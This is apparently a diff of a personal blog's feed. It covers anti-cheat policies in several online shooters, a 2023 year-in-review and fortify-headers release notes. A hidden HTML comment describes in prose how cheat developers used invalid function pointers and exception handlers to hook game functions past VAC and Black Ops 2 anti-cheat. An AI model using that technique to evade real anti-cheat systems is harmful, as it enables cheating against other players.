+<li>To play ranked, one need to reach <a href="https://ubisoft.com/en-gb/game/rainbow-six/siege/news-updates/4hShcX2HZTG2ttIi3IIN9Y/matchmaking-rating">level 50</a>,
+ which takes around 50h, give or takes.</li>
+<li>The game has a rich ecosystem of cosmetics
+ than can be <a href="https://store.ubisoft.com/us/dlc-type-skins-cosmetics">purchased for steep prices</a>,
+ and painstakingly earned by playing,
+ that would be lost in cast of an account ban.</li>
+<li>Friendly fire will result in the damages being applied to the shoot
+ should it be reported as voluntary by the player at the receiving end.</li>
+<li>It's developing a pretty involved <a href="https://ubisoft.com/en-gb/game/rainbow-six/siege/news-updates/22JLMFeayzuamhb7YKbAjm/reputation-system-activation-more">reputation system</a>,
+ where people with a "positive" behaviour gets rewarded (more experience
+ points, cosmetics, …), while those with a "negative" one
+ might be prevented from playing <em>ranked</em>,
+ get less experience points,
+ …</li>
+</ul>
+<h3><a href="https://en.wikipedia.org/wiki/Call_of_Duty:_Modern_Warfare_II_(2022_video_game)">Call of Duty: Modern Warfare II</a>:</h3>
+<ul>
+<li>The game costs <a href="https://store.steampowered.com/app/1962660/Call_of_Duty_Modern_Warfare_II/">$70</a>.</li>
+<li><a href="https://callofduty.com/blog/2023/02/call-of-duty-modern-warfare-II-ranked-play-features-challenges-rewards">"Players must be at least Level 16 to access Ranked Play"</a>,
+ but this can be done in a couple of hours.</li>
+<li>Cheating results in account-wise permaban across all Call of Duty titles.</li>
+<li>Banned accounts have their records purged from leaderboards.</li>
+<li>Players engaging in "negative" behaviours might get
+ muted on chat/voice, … and interestingly, cheaters
+ are going to get paired with other cheaters in matchmaking.
+ <a href="https://support.activision.com/articles/call-of-duty-security-and-enforcement-policy">Players who are often playing with the same cheaters</a> (boosting),
+ will also get their reputation tanked.</li>
+</ul>
+<h3><a href="https://playvalorant.com/">Valorant</a></h3>
+<p>Its developer even published a
+<a href="https://playvalorant.com/en-us/news/tags/game-health-series/">great series of blopost</a> on
+what it calls "game health"</p>
+<ul>
+<li>The game is free-to-play, but comes with <em>a lot</em> of <a href="https://valorantstrike.com/valorant-store/">cosmetics</a>.</li>
+<li>Cheaters get a permaban, but people benefiting from them might get a 6 months one as well.</li>
+<li>Players joining games and <a href="https://playvalorant.com/en-gb/news/dev/valorant-behavior-detection-and-penalty-updates/">idling to reap out experience points</a>,
+ doing nothing but kneecapping their team will <a href="https://playvalorant.com/en-us/news/dev/valorant-systems-health-series-afk/">get penalised</a>.</li>
+<li>Players are encouraged to report toxic behaviours, and to not engage,
+ since engagement might be penalized as well</li>
+<li>Players using,
+ <a href="https://support-valorant.riotgames.com/hc/en-us/articles/360044791253-Inappropriate-In-Game-Names">certain words</a>
+ whether in chat or as username,
+ will be flagged as toxic.</li>
+<li>Penalties come in various size, shapes and durations, allowing to fine tune
+ according to behaviour: warnings, voice/chat restrictions,
+ reduction in experience points
+ gain, reduction in raked rating, increased queue waiting time, ranking game
+ ban, global ban.</li>
+<li>Valorant <a href="https://playvalorant.com/en-us/news/dev/valorant-systems-health-series-smurf-detection/">published</a>
+ their approach to mitigate smurfing; acknowledging that while having multiple accounts
+ to smurf/trade/evade bans/… is not desirable, some people are using
+ them to to play with friends with a better/worse ranked level.
+ So while they took measures to detect and mitigate having multi-accounts,
+ they also relaxed the maximum ranks difference for players to play together,
+ which significantly reduced the number of alt-accounts usage,
+ but also didn't alter match fairness in a measurable way.</li>
+</ul>
+<h2>Conclusion</h2>
+<p>This is all nice and dandy, but is it working? According to
+data from <a href="https://www.ubisoft.com/en-us/game/rainbow-six/siege/player-protection">Rainbow Six Siege</a>:
+<a href="https://playvalorant.com/en-us/news/tags/game-health-series/">Valorant</a>,
+<a href="https://www.callofduty.com/blog/2023/06/call-of-duty-ricochet-anti-cheat-season-04-update">Call of Duty: Modern Warfare 2</a>,
+… those measures are indeed working pretty well,
+and are likely providing better results than technical-only
+measures. They are also cheaper, since steering people away from toxic
+behaviours doesn't reduce the number of players as much as banning them
+outright. It's nice to see that the video game industry realised that cheating and
+abuses/toxicity could be addressed in similar non-technical ways, and that both
+approaches are complementary. This is a stark contrast to other ones,
+where techno-solutionism is seen at the only possible remedy, even more so
+in our machine-learning-all-the-things era. </p>
+<h2>Sources and resources</h2>
+<ul>
+<li><a href="https://youtube.com/watch?v=hI7V60r7Jco">Anti-Cheat for Multiplayer Games</a></li>
+<li><a href="https://secret.club/">Secret Club</a></li>
+<li><a href="https://unknowncheats.me/">UnKnoWnCheaTs</a></li>
+</ul>
+<!--
+
+Steam's VAC was already doing basic stuff, like hashing the entire code region of the game on launch, storing the hash, and then re-hashing the code region every few minutes to see if someone had changed the code, presumably to install a trampoline and hook into the game's functions (to write aimbots, wallhacks, etc). When a hash change is detected, the player is banned.
+
+Cheaters found a way to bypass this by simply finding the function they desired to hook and setting any random function pointer within it to 0 (stored in rw memory, so doesn't trigger the code region hash mentioned above). This would trigger an exception, which the cheat developer would catch with Windows' SEH/VEH, effectively giving them a hook into the function without having to modify the code region.
+
+Activision's anti-cheat would then go through a bunch of function pointers (the ones in network/rendering functions mostly, since that's where you'd want to hook to write cheats) and check for null pointers. If a pointer was null, they'd ban you.
+
+Funny enough, this was incredibly easy to bypass: just set the pointer to 1, or 2, or 3, or ...!! All of these addresses are most likely still invalid and they'll still trigger an exception, even though they're theoretically valid pointers, giving you a de-facto hook into the game that bypassed both VAC and BO2's anticheat, and was pretty much unpatchable. Perhaps that's why they started being annoying and banning people for running IDA, Cheat Engine, etc., which are certainly probable indicators but definitely not hard evidence for cheats.
+
+-->jvoisinFri, 12 Jan 2024 20:15:00 +0100tag:dustri.org,2024-01-12:/b/on-non-technical-video-games-cheat-mitigations.htmlgames2023 in retrospecthttps://dustri.org/b/2023-in-retrospect.html<p>In 2023, I did, amongst other things:</p>
+<ul>
+<li>Donated some money:<ul>
+<li>$400 to <a href="https://fsfe.org/">FSFE</a></li>
+<li>$5000 to <a href="https://noyb.eu">NOYB</a></li>
+<li>$5000 to <a href="https://riseup.net">Riseup</a></li>
+<li>$5000 to the <a href="https://archive.org">Internet Archive</a></li>
+<li>$5000 to the <a href="https://en.wikipedia.org/wiki/Planned_Parenthood">Planned Parenthood Federation of America</a></li>
+<li>$1000 to <a href="https://daysforgirls.org">days for girls</a>, on the advice of <a href="https://foreignbystander.com/">chik</a> from <a href="https://darkscience.net">darkscience</a>.</li>
+<li>$200 each, as a <a href="https://opensource.googleblog.com/search/label/peer%20bonus">Open Source Peer Bonus</a>, courtesy of Google, to<ul>
+<li><a href="https://github.com/richfelker/">Rich Felker</a> for their work on <a href="https://musl.libc.org">musl</a>.</li>
+<li><a href="https://mxxn.io/">Blaž Hrastnik</a> for their work on <a href="https://helix-editor.com">Helix</a>.</li>
+<li><a href="https://github.com/justinmk">Justin Keyes</a> for their work on <a href="https://neovim.io">Neovim</a>.</li>
+<li><a href="https://github.com/jeanas">Jean Abou-Samra</a> for their work on <a href="https://pygments.org">Pygments</a>.</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>Read a couple of books:<ul>
+<li><a href="https://en.wikipedia.org/wiki/The_Killer_(comics)">Le tueur</a></li>
+<li>Some <a href="https://en.wikipedia.org/wiki/Warhammer_40,000">Warhammer 40,000</a>:<ul>
+<li><a href="https://wh40k.lexicanum.com/wiki/Sons_of_the_Hydra_(Novel)">Sons of the Hydra</a>, neat.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/Dark_Imperium_(Anthology)">Dark Imperium (Anthology)</a></li>
+<li><a href="https://wh40k.lexicanum.com/wiki/Shroud_of_Night_(Novel)">Shroud of Night</a>, forgettable.</li>
+<li>The <a href="https://wh40k.lexicanum.com/wiki/Black_Legion_(Novel_Series)">Black Legion</a> duology, solid.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/Renegades:_Harrowmaster_(Novel)">Renegades: Harrowmaster</a>, witty.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/Assassinorum:_Kingmaker_(Novel)">Assassinorum: Kingmaker</a>, decent.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/Night_Lords_(Novel_Series)">Night Lords: The Omnibus</a>, outstanding.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/The_Deacon_of_Wounds_(Novel)">The Deacon of Wounds</a> great writing style.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/Assassinorum:_Execution_Force_(Novel)">Assassinorum: Execution force</a>, forgettable.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/The_Infinite_and_the_Divine_(Novel)">The Infinite and the Divine</a>, highly entertaining.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/The_End_and_the_Death:_Volume_I_(Novel)">The End and the Death vol. 1</a>, a <em>teensy</em> bit over the top.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/The_End_and_the_Death:_Volume_II_(Novel)">The End and the Death vol. 2</a>, almost there, almost there, ...</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/The_Macharian_Crusade_(Novel_Series)">The Macharian Crusade Omnibus</a>, a writing style a tad heavy.</li>
+<li>The <a href="https://wh40k.lexicanum.com/wiki/Dark_Imperium_(Novel_Series)">Dark Imperium</a> trilogy, nice to see the setting moving forward!</li>
+<li>The first 5 tomes of the <a href="https://wh40k.lexicanum.com/wiki/Dawn_of_Fire_(Novel_Series)">Dawn of Fire</a> heptalogy, definitely a series of books.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/The_Lion:_Son_of_the_Forest_(Novel)">The Lion: Son of the Forest</a>, I've seen Dragon Balls episodes with a quicker pace.</li>
+<li>Finished the <a href="https://wh40k.lexicanum.com/wiki/The_Beast_Arises_(Novel_Series)">Beast Arises</a>
+ dodecalogy. The last chapter of the final book deserved a book on its own,
+ instead of being speedrunned in ~30 pages.</li>
+</ul>
+</li>
+<li><a href="https://en.wikipedia.org/wiki/It%27s_OK_to_Be_Angry_About_Capitalism">It's OK to Be Angry About Capitalism</a></li>
+<li><a href="https://nostarch.com/hacks-leaks-and-revelations">Hacks, Leaks, and Revelations</a>: a <a href="https://dustri.org/b/book-review-hacks-leaks-and-revelations.html">reference</a></li>
+<li><a href="https://direct.mit.edu/books/book/3008/Beyond-ChoicesThe-Design-of-Ethical-Gameplay">Beyond choices: The design of ethical gameplay</a></li>
+<li><a href="https://editions-ixe.fr/catalogue/non-le-masculin-ne-lemporte-pas-sur-le-feminin-ned/">Non, le masculin ne l’emporte pas sur le féminin !</a></li>
+<li><a href="https://en.wikipedia.org/wiki/This_Changes_Everything_(book)">This Changes Everything: Capitalism vs. the Climate</a></li>
+<li><a href="https://www.goodreads.com/en/book/show/51176626">Break 'em Up: Recovering Our Freedom from Big Ag, Big Tech, and Big Money</a>.</li>
+<li><a href="https://aosabook.org/en/buy.html">The Performance of Open Source Applications</a>: contains some really nice tidbits.</li>
+<li><a href="https://aosabook.org/en/">The Architecture of Open Source Applications, Part 1.</a>: computers were a mistake.</li>
+<li><a href="https://nostarch.com/kill-it-fire">Kill It with Fire: Manage Aging Computer Systems (and Future Proof Modern Ones)</a></li>
+<li><a href="https://goodreads.com/book/show/38212110-technically-wrong">Technically Wrong: Sexist Apps, Biased Algorithms, and Other Threats of Toxic Tech</a></li>
+<li><a href="https://nostarch.com/locksport">Locksport - A Hacker’s Guide to Lockpicking, Impressioning, and Safe Cracking</a>: <a href="https://dustri.org/b/book-review-locksport-a-hackers-guide-to-lockpicking-impressioning-and-safe-cracking.html">great</a></li>
+<li><a href="https://freakyclown.com/publications">How I Rob Banks (and other such places)</a>, written in an unbearably cocky style, mildly entertaining.</li>
+<li><a href="https://samleecole.com">How Sex Changed the Internet and the Internet Changed Sex: An Unexpected History</a>, a bit too shallow for my taste.</li>
+<li><a href="https://toddrose.com/endofaverage">The End of Average</a>, great book, except the part where the author argues that the goal of schools is to prepare kids for jobs.</li>
+<li><a href="https://staffeng.com/book">Staff Engineer: Leadership beyond the management track</a>, I'm not there yet, but it helped me understand some coworker's jobs and struggles.</li>
+<li><a href="https://thirdeditions.com/en/sagas/94-metal-gear-solid-hideo-kojima-s-magnum-opus-9791094723616.html">Metal Gear Solid. Hideo Kojima's Magnum Opus</a>:
+ deluge of superlatives directed at Kojima, speculative opinionated wild rambling, no mention of the <a href="https://en.wikipedia.org/wiki/Quiet_(Metal_Gear)">rampant</a>
+ <a href="https://theguardian.com/technology/2014/apr/09/metal-gear-solid-ground-zeroes-sexual-violence">sexism</a>,
+ typos and frenchisms, … prefer the <a href="https://en.wikipedia.org/wiki/Metal_Gear">wikipedia</a> and <a href="https://metalgear.fandom.com/wiki/Metal_Gear_Wiki">fandom</a> pages instead.</li>
+<li><a href="https://en.wikipedia.org/wiki/The_Mirage_(Ruff_novel)">The Mirage</a>: I
+ was expecting more of a description of an alternative history than a
+ novel with a lame plot and forgettable characters. The humour is goofy
+ and unsubtle: a punk rock group called Green Desert has an anti-war
+ anthem named "Arabian Idiot"; a morning talk show called Jazeera &
+ Friends, … but this is completely on par with the post-11-September
+ anti-muslim/Iraqi rhetoric, making it both funny and perfectly adequate.</li>
+</ul>
+</li>
+<li>Moved back to France.</li>
+<li>Volunteered at a library.</li>
+<li>Refused to sell <a href="https://websec.fr">websec.fr</a></li>
+<li>Listened to <a href="https://listenbrainz.org/user/jvoisin/year-in-music/">some music</a>.</li>
+<li>Attended some concerts:<ul>
+<li><a href="https://en.wikipedia.org/wiki/Eisbrecher">Eisbrecher</a>, along with <a href="https://maerzfeld.de">Maerzfeld</a></li>
+<li><a href="https://gojira-music.com">Gojira</a>, along with <a href="https://alienweaponry.com">Alien Weaponry</a></li>
+<li><a href="https://katatonia.com">Katatonia</a>, along with
+ <a href="https://som.band">SOM</a> and <a href="https://solstafir.net">Sólstafir</a></li>
+<li><a href="https://heavenshallburn.com">Heaven Shall Burn</a>, along with
+ <a href="https://trivium.org">Trivium</a>,
+ <a href="https://en.wikipedia.org/wiki/Malevolence_(band)">Malevolence</a>, and
+ <a href="https://obituary.cc">Obituary</a></li>
+<li><a href="https://igorrr.com">Igorrr</a>, along with
+ <a href="https://derwegeinerfreiheit.de">Der Weg einer Freiheit</a>,
+ <a href="https://en.wikipedia.org/wiki/Amenra">Amenra</a>, and
+ <a href="http://hangmanschair.com">Hangman's Chain</a></li>
+</ul>
+</li>
+<li>Played some video games:<ul>
+<li>On a computer:<ul>
+<li><a href="https://www.doomworld.com/forum/topic/134292-myhousewad/">MyHouse.WAD</a>: <a href="https://doomwiki.org/wiki/My_House">wow</a>.</li>
+<li><a href="https://en.wikipedia.org/wiki/Observer_(video_game)">>observer_</a>: didn't like it.</li>
+<li><a href="https://en.wikipedia.org/wiki/Sea_of_Thieves">Sea of Thieves</a>, ~ok with friends.</li>
+<li><a href="https://hyperstrange.com/our-games/blood-west/">Blood West</a>: <a href="https://en.wikipedia.org/wiki/Thief_(series)">Thief</a> in the Far West.</li>
+<li><a href="https://en.wikipedia.org/wiki/Half-Life%3A_Alyx">Half Life: Alyx</a>: impressive in every way.</li>
+<li><a href="https://en.wikipedia.org/wiki/High_on_Life_(video_game)">High on Life</a>: excruciatingly tedious at best.</li>
+<li><a href="https://en.wikipedia.org/wiki/Cyberpunk_2077#Cyberpunk_2077:_Phantom_Liberty">Cyberpunk 2077: Phantom Liberty</a>: glorious.</li>
+<li><a href="https://en.wikipedia.org/wiki/Tom_Clancy's_Rainbow_Six_Siege">Rainbow Six: Siege</a>: better than <a href="https://en.wikipedia.org/wiki/Counter-Strike">Counter Strike</a>.</li>
+<li><a href="https://en.wikipedia.org/wiki/Hogwarts_Legacy">Hogwarts Legacy</a>: breathtaking and well rounded.</li>
+<li><a href="https://store.steampowered.com/app/2329130/Rewind_Or_Die/">Rewind or Die</a> felt like playing resident evil again <3</li>
+<li><a href="https://en.wikipedia.org/wiki/Outer_Wilds">Outer Wilds</a>: the controls were too terrible for me to play.</li>
+<li><a href="https://en.wikipedia.org/wiki/The_Last_of_Us_Part_I">The Last of Us Part 1</a>: ok-ish, not my jam, Joel is a moron.</li>
+<li><a href="https://en.wikipedia.org/wiki/The_Witcher_3%3A_Wild_Hunt">The Witcher 3 - Wild Hunt</a>: when did video game get so long…</li>
+<li><a href="https://en.wikipedia.org/wiki/Apex_Legends">Apex Legends</a>: a lame version of <a href="https://en.wikipedia.org/wiki/Titanfall_2">Titanfall 2</a>, ok-ish when playing ranked.</li>
+<li><a href="https://en.wikipedia.org/wiki/Warhammer_40,000:_Chaos_Gate_-_Daemonhunters">Warhammer 40,000: Chaos Gate - Daemonhunters</a>:
+ <a href="https://en.wikipedia.org/wiki/XCOM">XCOM</a> with <a href="https://wh40k.lexicanum.com/wiki/Grey_Knights">Grey knights</a>.</li>
+<li><a href="https://en.wikipedia.org/wiki/Metal%3A_Hellsinger">Metal: Hellsinger</a>: looked super-lame on gameplay videos, but was surprisingly fun.</li>
+<li><a href="https://en.wikipedia.org/wiki/Starfield_(video_game)">Starfield</a>: a buggy clunky quickly-boring
+ <a href="https://en.wikipedia.org/wiki/The_Elder_Scrolls_V:_Skyrim">Skyrim</a> in space, quickly went back to Cyberpunk 2077.</li>
+<li><a href="https://store.steampowered.com/app/1172650/INDUSTRIA/">Industria</a>: catastrophic performances for looking utterly terrible, along with a clunky feeling, promptly uninstalled.</li>
+<li><a href="https://en.wikipedia.org/wiki/Journey_to_the_Savage_Planet">Journey to the Savage Planet</a>: Rich in poop-oriented
+ jokes, trying hard to be funny and maybe even subversive but systematically falling flat.</li>
+<li><a href="https://en.wikipedia.org/wiki/Baldur%27s_Gate_3">Baldur's Gate 3</a>: not a
+ fan of the <a href="https://en.wikipedia.org/wiki/Dungeons_%26_Dragons">Dungeons & Dragons</a> dice-based
+ gameplay, nor of the hard dialog choices cutting entire parts of the game,
+ but still an amazing game.</li>
+<li><a href="https://en.wikipedia.org/wiki/Metal_Gear_Solid_V:_The_Phantom_Pain">Metal Gear Solid V: The Definitive Experience</a>,
+ so <a href="https://en.wikipedia.org/wiki/Metal_Gear_Solid_V:_Ground_Zeroes">Metal Gear Solid V: Ground Zeroes</a> and
+ <a href="https://en.wikipedia.org/wiki/Metal_Gear_Solid_V:_The_Phantom_Pain">Metal Gear Solid V: The Phantom Pain</a>.
+ I bought it after having seen the former being run at the <a href="https://gamesdonequick.com/tracker/run/5506">AGDQ 2023</a>.
+ Truly amazing game overall, except for the <a href="https://en.wikipedia.org/wiki/Metal_Gear_Solid_V:_The_Phantom_Pain#Portrayal_of_Quiet">sexualisation of the <em>sole</em> female character</a>.</li>
+</ul>
+</li>
+<li>On a (glorious) <a href="https://en.wikipedia.org/wiki/Steam_Deck">Steam Deck</a>:<ul>
+<li><a href="https://store.steampowered.com/app/638990/UNDYING/">UNDYING</a>: nice
+ zombie-related game.</li>
+<li><a href="https://store.steampowered.com/agecheck/app/1593500/">God of War</a>,
+ surprisingly "wholesome".</li>
+<li><a href="https://blacksaltgames.com/">Dredge</a>, terrific indie game: gorgeous looking, simple yet gripping gameplay, interesting lore and story, …</li>
+<li><a href="https://en.wikipedia.org/wiki/Vampyr_(video_game)">Vampyr</a>, because
+ I miss <a href="https://en.wikipedia.org/wiki/Vampire:_The_Masquerade_%E2%80%93_Bloodlines">Vampire: The Masquerade – Bloodlines</a>. It could have been so much more instead of being "meh".</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>Ported <a href="https://github.com/jvoisin/snuffleupagus">Snuffleupagus</a> to PHP8.3.</li>
+<li>Contributed to a couple of software:<ul>
+<li><a href="https://github.com/lite-xl/lite-xl/pulls?q=is%3Apr+author%3Ajvoisin">lite-xl</a></li>
+<li><a href="https://alpinelinux.org/">Alpine linux</a>, by:<ul>
+<li>becoming a <a href="https://pkgs.alpinelinux.org/packages?branch=edge&repo=&arch=&maintainer=Julien%20Voisin">package maintainer</a></li>
+<li><a href="https://gitlab.alpinelinux.org/alpine/tsc/-/issues/64">documenting a bit</a> the compiler-based mitigations,
+ and <a href="https://gitlab.alpinelinux.org/alpine/abuild/-/merge_requests/221">enabling some missing ones</a>.</li>
+</ul>
+</li>
+<li>Because of <a href="https://runzero.com">runZero</a>, I<ul>
+<li><a href="https://github.com/rapid7/recog/pulls?q=+is%3Apr+author%3Ajvoisin">contributed to recog</a> to improve some of its fingerprints;</li>
+<li><a href="https://github.com/Sonarr/Sonarr/issues/5601">made it less trivial</a> to detect Sonarr/Lidarr/Radarr/… versions.</li>
+</ul>
+</li>
+<li><a href="https://github.com/struct/isoalloc/pulls?q=is%3Apr+author%3Ajvoisin+created%3A2023">isoalloc</a></li>
+<li><a href="https://github.com/pygments/pygments/commits?author=jvoisin">pygments</a>, mainly by adding lexers.</li>
+<li><a href="https://github.com/morpheus65535/bazarr/pull/2304">bazaar</a>, making it work on Alpine Linux.</li>
+<li><a href="https://github.com/google/oss-fuzz/pulls?q=is%3Apr+author%3Ajvoisin">oss-fuzz</a>,
+ including some <a href="https://github.com/guidovranken/python-library-fuzzers/pulls?q=is%3Apr+author%3Ajvoisin">python fuzzers</a>.</li>
+<li><a href="https://github.com/daanx/mimalloc-bench">mimalloc-bench</a>,
+ resulting in some <a href="https://github.com/microsoft/snmalloc/pull/587#issuecomment-1442077886">real world improvements</a>.</li>
+<li><a href="https://github.com/quodlibet/mutagen/pulls/jvoisin">mutagen</a>, since it's
+ used by <a href="https://0xacab.org/jvoisin/mat2">mat2</a>. I even <a href="https://github.com/google/oss-fuzz/pull/10072">integrated it into
+ OSS-Fuzz</a>.</li>
+<li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is%3Apr+jvoisin">metasploit</a>,
+by doing a lot of code reviews for pull-requests, and landing some modules,
+ like a <a href="https://github.com/rapid7/metasploit-framework/pull/17711">SPIP RCE</a>,
+ courtesy of <a href="https://thinkloveshare.com/">Laluka</a> and <a href="https://twitter.com/coiffeur0x90">coiffeur</a>.</li>
+<li><a href="https://chrony.tuxfamily.org/">chrony</a>, spending some time debugging
+ <a href="https://mail-archive.com/chrony-dev@chrony.tuxfamily.org/msg02572.html">how to enable its seccomp sandbox</a>
+ on Alpine Linux, resulting in a <a href="https://gitlab.alpinelinux.org/alpine/aports/-/issues/14891#note_316587">couple of improvements</a>,
+ and of course a <a href="https://gitlab.alpinelinux.org/alpine/aports/-/merge_requests/47087">now-enabled-by-default sandbox</a> there.</li>
+</ul>
+</li>
+<li>Got a CVE for a bug I <a href="https://github.com/py-pdf/pypdf/security/advisories/GHSA-jrm6-h9cq-8gqw">reported</a> in 2020!</li>
+<li>Kept maintaining <a href="https://openmw.org">OpenMW</a>'s infrastructure.</li>
+<li>Learnt some <a href="https://en.wikipedia.org/wiki/Rust_(programming_language)">Rust</a> so I could hang out with the cool kids.</li>
+<li>Helped organise the <a href="http://g.co/ctf">GoogleCTF</a>, which was <a href="https://ctftime.org/event/1929">pretty well received</a>.</li>
+<li>Added more possible subtitles to this blog, bringing their numbers above 1100.</li>
+<li>Reduced the size of this website's webpages; most should now be around 10kb.</li>
+<li>Contributed a bit to Wikipedia, in <a href="https://en.wikipedia.org/wiki/Special:Contributions/jvoisin">English</a> and in <a href="https://fr.wikipedia.org/wiki/Sp%C3%A9cial:Contributions/jvoisin">French</a>
+ under my usual nickname.</li>
+<li>Moved my emails away from <a href="https://gandi.net">Gandi</a> over to <a href="https://migadu.com">Migadu</a>,
+ given their <a href="https://chatting.neocities.org/posts/2023-gandi-pricing">ludicrous</a> post-acquisition price increase.</li>
+<li><a href="https://github.com/jvoisin/compiler-flags-distro">Investigated</a> what
+ hardening-related compiler flags where enabled by default by popular Linux
+ distributions.</li>
+<li><a href="https://tests.stockfishchess.org/users#jvoisin">Contributed a bit</a> (by crunching numbers) to <a href="https://stockfishchess.org/">Stockfish</a>,
+ an open-source chess engine with an <a href="https://en.wikipedia.org/wiki/Elo_rating_system">Elo rating</a>
+ around <a href="https://computerchess.org.uk/ccrl/4040/rating_list_all.html">3500</a>.</li>
+<li>Got featured a couple of times on Hackernew/reddit/lobste.rs/… frontpage,
+ thanks to a <s><a href="https://www.reddit.com/r/karma/wiki/index/faq/">karma</a> junkie</s>
+ marketing-able <a href="https://dijit.sh">friend</a></li>
+<li>Kept maintaining <a href="https://nos-oignons.net/">Nos Oignons</a>'s infrastructure with <a href="https://corl3ss.com/">corl3ss</a>.
+ We're back at handling <a href="https://nos-oignons.net/Services/index.en.html">around 2%</a>
+ of tor's exit traffic! Our little non-profit is now 10 years old.</li>
+<li><a href="https://github.com/jvoisin/fortify-headers">Took over</a> the development and maintenance of
+ <a href="https://u.2f30.org/sin/">sin</a>'s <a href="https://git.2f30.org/fortify-headers/">fortify-headers</a>.
+ It's used by <a href="https://openwrt.org/">OpenWrt</a>, <a href="https://www.alpinelinux.org/">Alpine Linux</a>,
+ and <a href="https://bugs.gentoo.org/546692">soon</a> in <a href="https://wiki.gentoo.org/wiki/Project:Musl">Gentoo Hardened's musl flavour</a>.</li>
+<li>Ported my resume/cover letter template from
+ <a href="https://latex-project.org">LaTeX</a> to
+ <a href="https://typst.app/docs/guides/guide-for-latex-users/">typst</a> and felt so
+ much joy purging away all the LaTeX/TeXLive/XeTeX/LuaTeX/… garbage from my computer,
+ to never have to touch it again.</li>
+<li>Got a "Documented Feedback from Employee Relations" from HR at work for
+ saying "Awkward to have yet another middle aged rich white het guy come talk
+ about diversity and inclusion." on an internal chatroom, about <a href="https://booleanblackbelt.com/who-is-the-boolean-black-belt/">this middle
+ aged rich white het guy</a>
+ invited to give an internal talk about diversity and inclusion.</li>
+</ul>jvoisinSun, 31 Dec 2023 23:59:00 +0100tag:dustri.org,2023-12-31:/b/2023-in-retrospect.htmlmiscfortify-headers 2.1https://dustri.org/b/fortify-headers-21.html<p>Only 4 days after the <a href="https://dustri.org/b/fortify-headers-20.html">release</a> of
+<a href="https://github.com/jvoisin/fortify-headers">fortify-headers</a>,
+here is the <a href="https://github.com/jvoisin/fortify-headers/releases/tag/2.1">2.1</a>,
+fixing a couple of portability issues and tidying a bit the code.
+<a href="https://chimera-linux.org/">Chimera Linux</a> users are
+<a href="https://github.com/chimera-linux/cports/commit/a26be649d8a13c1012d5e165055d354a6bab1af8">as of today</a>
+<del>test driving</del> benefiting from it.</p>
+<h2>Changelog</h2>
+<ul>
+<li>Remove superfluous includes from the headers</li>
+<li>Put some functions in to their proper files</li>
+<li>Add a missing include in <code>sys/select.h</code></li>
+<li>Do not use static inline for C++ to avoid <a href="https://en.wikipedia.org/wiki/One_Definition_Rule">ODR</a>-wise violation</li>
+<li>Guard some conditional stdio APIs with the right macros</li>
+<li>Fix a typo that would prevent C++ code from compiling correctly</li>
+<li>Rename macros to be more namespace-friendly</li>
+</ul>
+<h2>Implementation details</h2>
+<p>Including parts from the
+<a href="https://en.wikipedia.org/wiki/Standard_library">stdlib</a> in fortify means that
+programs that don't correctly include everything they need might compile, even
+though they shouldn't. Fortunately, the only bits used are either:</p>
+<ul>
+<li><code>size_t</code>, which can be obtained by using <code>typeof(sizeof(char))</code>,
+ since it's by definition the type returned by <code>sizeof</code>.</li>
+<li>constants like <code>PATH_MAX</code> (that we can define to <code>4096</code>), <code>MB_LEN_MAX</code>
+ (defined as 16), ...</li>
+<li>eldritch constructs like <a href="https://www.man7.org/linux/man-pages/man3/MB_CUR_MAX.3.html"><code>MB_CUR_MAX</code></a>,
+ whose usage we hide behind an <code>#ifdef</code>.</li>
+</ul>
+<p>The other big thing is the one caught by <a href="https://github.com/ssbr">Devin Jeanpierre</a>, the usage of <code>static
+inline</code> while <a href="https://en.cppreference.com/w/c/language/inline">absolutely alright in C</a>,
+is problematic in C++, because of the <a href="https://en.wikipedia.org/wiki/One_Definition_Rule">One Definition Rule</a>:
+In C++, if a function is declared inline, it must be declared inline in every translation unit, and also every
+definition of an inline function must be exactly the same (while in C they may
+be different.) On the other hand, C++ allows non-const function-local
+statics and all function-local statics from different definitions of an inline
+function are the same in C++, but distinct in C.
+More practically, calling <code>FORTIFY_INLINE</code> functions from an inline function in C++, and including
+the header defining that inline function in more than one <a href="https://en.wikipedia.org/wiki/Translation_unit_%28programming%29">translation
+unit</a> results
+in undefined behaviour. The fix is easy, and was
+<a href="https://github.com/jvoisin/fortify-headers/commit/c607773a80e6685ab4c922245c33cf2ea5dcfb72">commited</a>
+by <a href="https;//github.com/q66">q66</a>: use <code>static</code> instead of <code>static inline</code> in C++.</p>
+<p>Thanks <a href="https://github.com/ssbr">Devin Jeanpierre</a> for spending time to look at
+C++ compatibility, <a href="https://github.com/q66">q66</a> for his patches, willingness to ship
+fortify-headers in Chimera, and becoming co-maintainer.</p>jvoisinSat, 16 Dec 2023 20:30:00 +0100tag:dustri.org,2023-12-16:/b/fortify-headers-21.htmlsecurityfortify-headers 2.0https://dustri.org/b/fortify-headers-20.html<p>8 months ago, I started to contribute to <a href="https://git.2f30.org/fortify-headers/">fortify-headers</a>,
+a standalone <a href="https://gcc.gnu.org/legacy-ml/gcc-patches/2004-09/msg02055.html">fortify-source</a> implementation,
+with the goal of implementing <code>FORTIFY_SOURCE=3</code>, since the current version
+only implemented <code>FORTIFY_SOURCE=2</code>. I reached out to
+<a href="https://u.2f30.org/sin/">sin</a>, the original maintainer, to ask if he was
+interested in my changes, and he told me the project wasn't maintained
+anymore. But he would be happy to give me the commit bit instead. I spent
+some months <a href="https://github.com/jvoisin/fortify-headers">writing code</a> before
+accepting, to see if it would be a good idea: Would I be able to maintain it?
+To improve it? Add more features? and so on. Turns out the answer is yes, and
+I'm thus happy to announce the immediate availability of <a href="https://git.2f30.org/fortify-headers/refs.html">fortify-headers
+2.0</a>!</p>
+<h2>Changelog</h2>
+<ul>
+<li>Added clang support, based on <a href="https://github.com/q66">q66</a>'s patches.</li>
+<li>Fixed a 64b-related incompatibility around <code>ppoll</code> </li>
